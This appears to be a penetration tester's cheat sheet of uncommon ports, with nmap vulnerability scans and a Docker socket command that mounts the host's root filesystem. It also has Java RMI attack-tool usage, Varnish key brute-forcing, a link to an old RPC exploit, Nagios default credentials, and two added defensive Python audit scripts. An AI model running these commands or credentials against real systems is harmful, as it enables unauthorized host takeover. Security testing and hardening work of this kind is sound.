
UnCommon Ports


CPANEL Ports

cPanel	2082
cPanel - SSL	2083
WHM	2086
WHM - SSL	2087
Webmail	2095
Webmail - SSL	2096

SFTP Shared/Reseller Servers	2222
Webdisk	2077
Webdisk - SSL	2078
SSH Shared/Reseller Servers	2222


Plesk Control Panel	8880
Plesk Control Panel - SSL	8443
Plesk Windows Webmail (SmarterMail)	9998
DotNet Panel	9001
10000/tcp - WebAdmin (Webmin MiniServ 2.021; has a few known vulnerabilities)
Port 5601, 9200 - Kibana

NDMP

Port 10000 - NDMP
nmap -p 10000 --script ndmp-fs-info,vuln -sVC -d 10.10.10.10

Port 30000 - NDMPS
nmap -p 30000 --script ndmp-fs-info,vuln -sVC -d 10.10.10.10

NetApp NDFS Common Ports
Parallel Virtual File System (PVFS)
TCP port 3334 - heap overflow

RDP - Port 3389
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 10.10.10.10

Docker Port - 2375

2375: unencrypted Docker socket; remote, passwordless root access to the host
2376: TLS-encrypted socket; on CI servers this is often seen on port 4243 (a variation on HTTPS 443)
2377: swarm mode socket, for swarm managers, not for Docker clients
5000: Docker registry service
4789 and 7946: overlay networking

docker -H 10.10.10.10:2375 run -it --rm --privileged -v /:/rootfs --net host --pid host busybox

check this out if you observe any issues
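As an added example (not from the original post), a small Python audit of a Docker daemon.json that flags the exposure described above: any tcp:// listener without mutual TLS, plus a listener bound to all interfaces. It assumes the daemon is configured through daemon.json's hosts/tls/tlsverify keys rather than command-line -H flags; the sample configs are constructed.

```python
import json
from urllib.parse import urlsplit

PLAINTEXT_API_PORT = 2375  # conventional port of the unencrypted API described above


def audit_daemon_config(daemon_json: str) -> list[tuple[str, str]]:
    """Return (listener, issue) pairs for every risky tcp:// listener in a daemon.json."""
    cfg = json.loads(daemon_json)
    tls = bool(cfg.get("tls", False))
    tls_verify = bool(cfg.get("tlsverify", False))  # mutual TLS: client certs required
    issues = []
    for host in cfg.get("hosts", []):
        if not host.startswith("tcp://"):
            continue  # unix:// and fd:// listeners are only reachable from the host itself
        parts = urlsplit(host)
        if tls_verify:
            if parts.port == PLAINTEXT_API_PORT:
                # Authenticated, but sitting on the port clients and scanners assume is plaintext
                issues.append((host, "TLS_ON_PLAINTEXT_PORT"))
        elif tls:
            # Encrypted, but any client that trusts the server certificate can still connect
            issues.append((host, "TLS_WITHOUT_CLIENT_AUTH"))
        else:
            # The exposure shown above: anyone who can reach the port controls the host
            issues.append((host, "PLAINTEXT_API"))
        if parts.hostname in ("0.0.0.0", "::"):
            issues.append((host, "ALL_INTERFACES"))
    return issues


# Constructed sample: the weak setting beside the hardened one (not from a real host).
WEAK_CONFIG = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'
HARDENED_CONFIG = (
    '{"hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],'
    ' "tlsverify": true, "tlscacert": "/etc/docker/ca.pem",'
    ' "tlscert": "/etc/docker/server-cert.pem", "tlskey": "/etc/docker/server-key.pem"}'
)

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_daemon_config(cfg) or "no issues")
```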
Java RMI Registry - Port 1616

nmap -Pn -sS -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p 1616 10.10.10.10

#Tools to test RMI 
https://github.com/qtc-de/remote-method-guesser 
https://github.com/NickstaDB/BaRMIe/releases/tag/v1.01 

java -jar BaRMIe.jar -enum 192.168.1.11 5000
java -jar BaRMIe.jar -attack 192.168.1.11 5000
java -jar rmg-3.0.0-jar-with-dependencies.jar 10.10.10.10 5000 enum
Prometheus - Port 9100,9104

Monitoring tool. Go to IP:9100/metrics --> check whether the exposed metrics reveal any useful information.

https://www.acunetix.com/vulnerabilities/web/unrestricted-access-to-prometheus-metrics/
Varnish HTTP Cache Server - Port 6081,6082

apt-get install varnish

#Access the server
varnishadm -T 10.10.10.10:6081 

#Access with a secret key - bruteforce the key 
varnishadm -T 10.10.10.10:6081 -S SECRET_KEY

More info here

#VARNISH Request smuggling - CVE-2021-36740
https://www.cybersecurity-help.cz/vdb/SB2021080215 
Redis - port 5460

redis-cli -h 10.10.10.10 -p 5460
Tanium Client - Port 17472/tcp
SunOS RPC Vuln

https://www.giac.org/paper/gcih/262/sun-solaris-compromise-rpc-ttdbserverd-exploit/102732 

Get the exploit from here https://web.archive.org/web/20020309073405/http://packetstorm.decepticons.org/0008-exploits/rpc_ttdbserverd.c 

If program number 100083 exists on the host, then the ttdbserverd service is running. The TCP port number the portmapper assigned to ttdbserverd is 32775 - UDP

#find the service in the nmap report
grep -nr '100068  2,3,4,5    32800/udp   cmsd'

grep -nr '100083  1          32775/tcp   ttdbserverd'
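An added example, not from the original post: a Python parser that scans nmap rpcinfo-style output for the two legacy RPC programs named above (100083 ttdbserverd, 100068 cmsd), the way a defender would when inventorying hosts that still register them. The sample report is constructed in nmap's rpcinfo line format.

```python
import re

# One nmap "rpcinfo" script line, e.g. "|   100083  1          32775/tcp   ttdbserverd".
# The leading "|" / "|_" is nmap's script-output prefix; the regex also accepts bare lines.
RPC_LINE = re.compile(
    r"^\|?_?\s*(?P<prog>\d+)\s+(?P<vers>[\d,]+)\s+(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<name>\S+)"
)

# Legacy RPC programs named in the section above; both should be disabled on modern hosts.
LEGACY_RPC_PROGRAMS = {100083: "ttdbserverd", 100068: "cmsd"}


def find_legacy_rpc(report: str) -> list[dict]:
    """Return one finding per legacy RPC program registered with the portmapper."""
    findings = []
    for line in report.splitlines():
        m = RPC_LINE.match(line)
        if not m:
            continue  # headers, blank lines and non-rpcinfo output
        prog = int(m["prog"])
        if prog not in LEGACY_RPC_PROGRAMS:
            continue
        findings.append({
            "program": prog,
            "name": m["name"],
            "port": int(m["port"]),
            "proto": m["proto"],
            "versions": m["vers"].split(","),
        })
    return findings


# Constructed sample in nmap rpcinfo format (not a real scan result).
SAMPLE_REPORT = """\
| rpcinfo:
|   program  version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100068  2,3,4,5    32800/udp   cmsd
|   100083  1          32775/tcp   ttdbserverd
|_  100021  1,2,3,4    32771/udp   nlockmgr
"""

if __name__ == "__main__":
    for f in find_legacy_rpc(SAMPLE_REPORT):
        print(f"{f['name']} (program {f['program']}) on {f['port']}/{f['proto']}")
```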

Nagios

Usually it runs on Port 80 - http://10.10.10.10/nagios

Default Creds:
nagiosadmin  PASSW0RD
nagiosxi
nagiosuser
mysqladmin -u root -pnagiosxi password welcome

"user" => 'nagiosxi',
"pwd" => 'n@gweb',


